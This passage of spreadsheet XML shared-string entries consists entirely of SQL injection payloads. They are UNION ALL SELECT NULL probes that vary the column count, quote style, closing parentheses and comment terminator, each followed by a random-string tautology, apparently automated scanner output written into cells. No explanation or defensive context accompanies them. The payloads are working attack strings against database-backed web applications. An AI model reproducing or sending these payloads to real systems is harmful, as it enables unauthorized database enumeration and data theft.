    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'tLjv' = 'tLjv</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'lAJz' = 'lAJz</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'qHAD' = 'qHAD</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'wTvk' = 'wTvk</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'uFgG' = 'uFgG</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Kpfy' = 'Kpfy</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'HJfY' = 'HJfY</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'rTED' = 'rTED</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'jPsg' = 'jPsg</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'wRtO' = 'wRtO</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'YmGn' = 'YmGn</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ZFpj' = 'ZFpj</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'FtBO' = 'FtBO</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'mwDH' = 'mwDH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'UkEp' = 'UkEp</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'HawV' = 'HawV</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'zjhD' = 'zjhD</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'CUxo' = 'CUxo</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'OcsW' = 'OcsW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'nmjV' = 'nmjV</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'kOmO' = 'kOmO</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'awxh' = 'awxh</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'LFQc' = 'LFQc</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'SjQi' = 'SjQi</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'sjZr' = 'sjZr</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'xLlv' = 'xLlv</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Swqt' = 'Swqt</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Zvnz' = 'Zvnz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'eehw' LIKE 'eehw</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'TJol' LIKE 'TJol</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'fmuf' LIKE 'fmuf</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'DSNi' LIKE 'DSNi</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'RJSg' LIKE 'RJSg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'qywH' LIKE 'qywH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'NNVC' LIKE 'NNVC</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'iEbt' LIKE 'iEbt</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'WAtY' LIKE 'WAtY</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'iCmX' LIKE 'iCmX</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'OEdd' LIKE 'OEdd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'pdBR' LIKE 'pdBR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'yWnd' LIKE 'yWnd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'STBo' LIKE 'STBo</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'eIhq' LIKE 'eIhq</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'hHvV' LIKE 'hHvV</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'DmCO' LIKE 'DmCO</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'ORpg' LIKE 'ORpg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'LBvY' LIKE 'LBvY</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'CqZA' LIKE 'CqZA</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'fqNZ' LIKE 'fqNZ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'SsXS' LIKE 'SsXS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'BcpO' LIKE 'BcpO</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ueIs' LIKE 'ueIs</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'bDfF' LIKE 'bDfF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'wJat' LIKE 'wJat</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'LNnU' LIKE 'LNnU</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'cGzr' LIKE 'cGzr</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'iLaF' LIKE 'iLaF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'lCoq' LIKE 'lCoq</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'SBvu' LIKE 'SBvu</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'derW' LIKE 'derW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'HLys' LIKE 'HLys</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'FeWU' LIKE 'FeWU</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'fwCo' LIKE 'fwCo</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'USfK' LIKE 'USfK</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'cRcP' LIKE 'cRcP</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'EYsa' LIKE 'EYsa</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'RfIJ' LIKE 'RfIJ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'xMGU' LIKE 'xMGU</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "qFwM" = "qFwM</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "CDHh" = "CDHh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "axDu" = "axDu</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "mhCZ" = "mhCZ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "bxZF" = "bxZF</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "POKI" = "POKI</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "odVQ" = "odVQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "TdDu" = "TdDu</t>
  </si>
  <si>
